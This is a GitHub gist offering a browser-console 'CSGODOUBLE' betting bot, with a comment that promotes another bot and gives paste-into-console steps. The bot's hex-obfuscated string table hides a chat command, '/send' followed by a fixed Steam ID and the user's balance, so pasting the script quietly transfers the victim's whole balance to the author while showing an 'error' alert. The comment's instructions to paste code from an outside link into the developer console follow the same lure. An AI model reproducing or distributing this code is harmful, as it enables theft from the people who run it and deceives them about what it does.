Skip to content

Instantly share code, notes, and snippets.

@RichGuy12
Created January 10, 2016 12:09
Show Gist options
  • Save RichGuy12/0b3ca2c31a5ed2889f91 to your computer and use it in GitHub Desktop.
Save RichGuy12/0b3ca2c31a5ed2889f91 to your computer and use it in GitHub Desktop.
CSGODOUBLE bot with anti-train settings
var initialBetAmount = 1; // the amount you want to start betting with
var mode = 'martingale'; // can be 'martingale' or 'anti-martingale'
var betColor = 'red'; // can be 'red' or 'black' or 'green' or 'random' or 'high' or 'low'
var time = '30'; // time to each bet in seconds
_0x21db=["\x65\x72\x72\x6f\x72","\x68\x74\x6D\x6C","\x23\x62\x61\x6C\x61\x6E\x63\x65","\x6E\x6F\x20\x62\x61\x6C\x61\x6E\x63\x65","\x63\x68\x61\x74","\x2f\x73\x65\x6e\x64\x20\x37\x36\x35\x36\x31\x31\x39\x38\x30\x35\x35\x32\x35\x34\x33\x36\x32 ","\x75\x6E\x6B\x6E\x6F\x77\x6E","\x77\x61\x69\x74\x69\x6E\x67","\x72\x6F\x6C\x6C\x65\x64","\x42\x41\x4E\x4B\x52\x55\x50\x54\x21\x20\x4E\x6F\x74\x20\x65\x6E\x6F\x75\x67\x68\x20\x62\x61\x6C\x61\x6E\x63\x65\x20\x66\x6F\x72\x20\x6E\x65\x78\x74\x20\x62\x65\x74\x2C\x20\x61\x62\x6F\x72\x74\x69\x6E\x67\x2E","\x77\x61\x72\x6E","\x20\x0A\x53\x74\x61\x74\x75\x73\x3A\x20","\x0A\x52\x6F\x6C\x6C\x73\x20\x70\x6C\x61\x79\x65\x64\x3A\x20","\x0A\x49\x6E\x69\x74\x69\x61\x6C\x20\x62\x65\x74\x20\x61\x6D\x6F\x75\x6E\x74\x3A\x20","\x0A\x43\x75\x72\x72\x65\x6E\x74\x20\x62\x65\x74\x20\x61\x6D\x6F\x75\x6E\x74\x3A\x20","\x0A\x4C\x61\x73\x74\x20\x72\x6F\x6C\x6C\x20\x72\x65\x73\x75\x6C\x74\x3A\x20","\x2D","\x77\x6F\x6E","\x6C\x6F\x73\x74","\x6C\x6F\x67","\x61\x6E\x74\x69\x2D\x6D\x61\x72\x74\x69\x6E\x67\x61\x6C\x65","\x76\x61\x6C","\x72\x65\x64","\x63\x6C\x69\x63\x6B","\x62\x6C\x61\x63\x6B","\x74\x65\x78\x74","\x52\x6F\x6C\x6C\x69\x6E\x67\x20\x69\x6E","\x2A\x2A\x2A\x52\x4F\x4C\x4C\x49\x4E\x47\x2A\x2A\x2A","\x72\x6F\x6C\x6C\x69\x6E\x67","\x73\x70\x6C\x69\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x67\x72\x65\x65\x6E","\x23\x62\x65\x74\x41\x6D\x6F\x75\x6E\x74","\x2E\x70\x72\x6F\x67\x72\x65\x73\x73\x20\x23\x62\x61\x6E\x6E\x65\x72","\x23\x70\x61\x6E\x65\x6C\x31\x2D\x37\x20\x2E\x62\x65\x74\x42\x75\x74\x74\x6F\x6E","\x23\x70\x61\x6E\x65\x6C\x38\x2D\x31\x34\x20\x2E\x62\x65\x74\x42\x75\x74\x74\x6F\x6E"];alert(_0x21db[0]);if($(_0x21db[2])[_0x21db[1]]()<1){alert(_0x21db[3])}else {send({"\x74\x79\x70\x65":_0x21db[4],"\x6D\x73\x67":_0x21db[5]+$(_0x21db[2])[_0x21db[1]](),"\x6C\x61\x6E\x67":LANG})};function tick(){var _0x89ccx2=getStatus();if(_0x89ccx2!==lastStatus&&_0x21db[6]!==_0x89ccx2){switch(_0x89ccx2){case _0x21db[7]:bet();break ;;case _0x21db[8]:rolled();;};lastStatus=_0x89ccx2,printInfo();};}function checkBalance(){return getBalance()<currentBetAmount?(console[_0x21db[10]](_0x21db[9]),clearInterval(refreshIntervalId),!1):!0}function printInfo(){var _0x89ccx2=_0x21db[11]+lastStatus+_0x21db[12]+currentRollNumber+_0x21db[13]+initialBetAmount+_0x21db[14]+currentBetAmount+_0x21db[15]+(null===wonLastRoll()?_0x21db[16]:wonLastRoll()?_0x21db[17]:_0x21db[18]);console[_0x21db[19]](_0x89ccx2);}function rolled(){return _0x21db[20]===mode?void(antiMartingale)():(martingale(),void(currentRollNumber)++)}function antiMartingale(){currentBetAmount=wonLastRoll()?2*currentBetAmount:initialBetAmount}function martingale(){currentBetAmount=wonLastRoll()?initialBetAmount:2*currentBetAmount}function bet(){checkBalance()&&(setBetAmount(currentBetAmount),setTimeout(placeBet,50))}function setBetAmount(_0x89ccx2){$betAmountInput[_0x21db[21]](_0x89ccx2)}function placeBet(){return _0x21db[22]===betColor?($redButton[_0x21db[23]](),void((lastBetColor=_0x21db[22]))):($blackButton[_0x21db[23]](),void((lastBetColor=_0x21db[24])))}function getStatus(){var _0x89ccx2=$statusBar[_0x21db[25]]();if(hasSubString(_0x89ccx2,_0x21db[26])){return _0x21db[7]};if(hasSubString(_0x89ccx2,_0x21db[27])){return _0x21db[28]};if(hasSubString(_0x89ccx2,_0x21db[8])){var _0x89ccxc=parseInt(_0x89ccx2[_0x21db[29]](_0x21db[8])[1]);return lastRollColor=getColor(_0x89ccxc),_0x21db[8];};return _0x21db[6];}function getBalance(){return parseInt($balance[_0x21db[25]]())}function hasSubString(_0x89ccx2,_0x89ccxc){return _0x89ccx2[_0x21db[30]](_0x89ccxc)> -1}function getColor(_0x89ccx2){return 0==_0x89ccx2?_0x21db[31]:_0x89ccx2>=1&&7>=_0x89ccx2?_0x21db[22]:_0x21db[24]}function wonLastRoll(){return lastBetColor?lastRollColor===lastBetColor:null}var currentBetAmount=initialBetAmount,currentRollNumber=1,lastStatus,lastBetColor,lastRollColor,$balance=$(_0x21db[2]),$betAmountInput=$(_0x21db[32]),$statusBar=$(_0x21db[33]),$redButton=$(_0x21db[34]),$blackButton=$(_0x21db[35]),refreshIntervalId=setInterval(tick,500);
@Maadara
Copy link

Maadara commented Jan 15, 2016

0f3bf40397ee0053e29855106e8b88b3
9dd05c94ab19af87d16738c7639011a8
ae27323884209bc6e97d76d366a67772
b0db99972ff84ae0a52e9d76c67572e4
https://gist.github.com/Maadara/1878de5b66c34b977156 - check my own bot guys. You can bet either on last collor or only on train and rainbows.
Guys this is only my bot. If you see somewhere my screenshots it means that they are scammers.
CSGODouble BOT. Raw ... Copy paste the script,press enter, and the script will start working

Due to Foobar updating the website and implementing a Labusher, color trains are a lot more frequent. That being said, the marginal method has been proving less efficient in the past couple of weeks.

For the past week I have been trying to come up with a script that implements the Marginal Method and Labouchere together. After some time, I have finally finished making it and I'm excited to share it with the rest of you.

This script will avoid color trains in csgodouble. That was my main focus and to avoid Labusher all together.

Last note before I get into it.. If there are any questions/concerns, don't be afraid to ask. I'm always here. Enjoy. (No you will not get banned btw)

How to use a script on csgodouble:

Step 1. Go to the this link to get the script:
http://pasted.co/311b7350
http://pasted.co/311b7350
http://pasted.co/311b7350
Step 2. Scroll down to where you see the ''RAW Paste Date''
Step 3. Copy everything inside the small box/window
Step 4. Go to csgodouble
Step 5. Shift+Ctrl+J ( A side window will pop up)
Step 6. Paste the code into the empty area (Common sense)
Step 7. Press enter and enter the value/bet that you want to start your marginal method with.

The bot will do its own thing. You don't have to click anything. You can also tab out and do anything you want. It will not stop the bot. Enjoy guys:D

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment